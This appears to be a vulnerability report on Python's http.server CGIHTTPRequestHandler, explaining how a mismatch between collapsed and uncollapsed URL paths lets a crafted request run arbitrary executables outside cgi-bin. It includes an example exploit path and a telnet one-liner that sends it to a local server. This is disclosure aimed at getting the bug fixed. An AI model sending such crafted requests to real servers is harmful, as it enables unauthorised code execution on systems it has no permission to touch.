An error in separating the path and filename of the CGI script to run in http.server.CGIHTTPRequestHandler allows running arbitrary executables in the directory under which the server was started.

The problem is that in CGIHTTPRequestHandler we have:

  def run_cgi(self):    
      """Execute a CGI script."""    
      path = self.path    
      dir, rest = self.cgi_info    
  
      i = path.find('/', len(dir) + 1)    

where path is the uncollapsed path in the URL, but cgi_info contains the first path segment and the rest from the *collapsed* path as filled in by is_cgi(), so indexing into path via len(dir) is incorrect.

An example exploit is giving the request path:

///////////badscript.sh/../cgi-bin/cgi.sh

Note that Firefox and wget at least simplify the path in the request; to make sure this exact path is used, do for example:

  (echo "GET ///////////badscript.sh/../cgi-bin/cgi.sh HTTP/1.1"; echo) | telnet localhost 4443

This causes the CGIHTTPRequestHandler to execute the badscript.sh file in the directory in which the server was started, so script execution is not restricted to the cgi-bin/ or htbin/ subdirectories.